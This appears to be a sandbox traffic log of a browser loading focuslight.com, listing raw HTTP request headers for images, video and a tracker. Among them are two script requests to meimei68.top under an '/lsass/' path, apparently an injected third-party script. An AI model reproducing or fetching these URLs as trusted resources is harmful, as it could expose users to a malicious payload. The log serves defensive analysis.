Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/clicook.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jtrired1.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/xiangxia.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jtlered0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/01/%E8%BF%91%E6%9C%9F%E5%8F%82%E5%B1%95%E4%BF%A1%E6%81%AFEN.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/closevideo0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/dtimg.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/20230911094506.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn2.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/wlicn3.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/weixincodeimage.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo1.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/03/V-groove-EN-1-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/05/LWOP-EN-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/01/2025-2-28-%E6%B6%88%E8%B4%B9%E7%94%B5%E5%AD%90-EN-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/03/Global-Optimization-EN-1-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /lftracker_v1_ywVkO4X3lld7Z6Bj.js HTTP/1.1host: sc.lfeeder.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%85%89%E9%80%9A%E4%BF%A1.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E6%B6%88%E8%B4%B9%E7%94%B5%E5%AD%90.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/Focuslight-Advancing-Photonics-Technologies-Around-the-World-1.mp4 HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%85%88%E8%BF%9B%E5%88%B6%E9%80%A0.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E6%B1%BD%E8%BD%A6%E5%BA%94%E7%94%A8.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/05/%E5%8C%BB%E7%96%97%E5%81%A5%E5%BA%B7.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/01/%E8%BF%91%E6%9C%9F%E5%8F%82%E5%B1%95%E4%BF%A1%E6%81%AFEN.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /lsass/index.php?fHYWBUn3 HTTP/1.1Host: meimei68.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/09/%E7%A7%91%E5%AD%A6%E7%A0%94%E7%A9%B6.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/Focuslight-Advancing-Photonics-Technologies-Around-the-World-1.mp4 HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Language: en-US,en;q=0.9Range: bytes=160694272-160884554If-Range: "DC118A8773E9D272246DBD8EFF6CBA2D"
Source: global traffic HTTP traffic detected: GET /?sid=ywVkO4X3lld7Z6Bj&data=... HTTP/1.1host: tr.lfeeder.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/12/Focuslight-Advancing-Photonics-Technologies-Around-the-World-1.mp4 HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Language: en-US,en;q=0.9Range: bytes=131072-160694271If-Range: "DC118A8773E9D272246DBD8EFF6CBA2D"
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo.svg HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /lsass/index.js?8a7441451c8ad03d76 HTTP/1.1Host: meimei68.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /?sid=ywVkO4X3lld7Z6Bj&data=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 HTTP/1.1host: tr.lfeeder.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jticn0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jticn1.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn1.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn2.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/spvideicn.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jiantouup.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/clicook.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jjbg.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/xingxingmap.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jgdtline.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/closevideo0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/footbg.jpg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: _lfa=LF1.1.6931b3ad21390f03.1748371910749priority: i
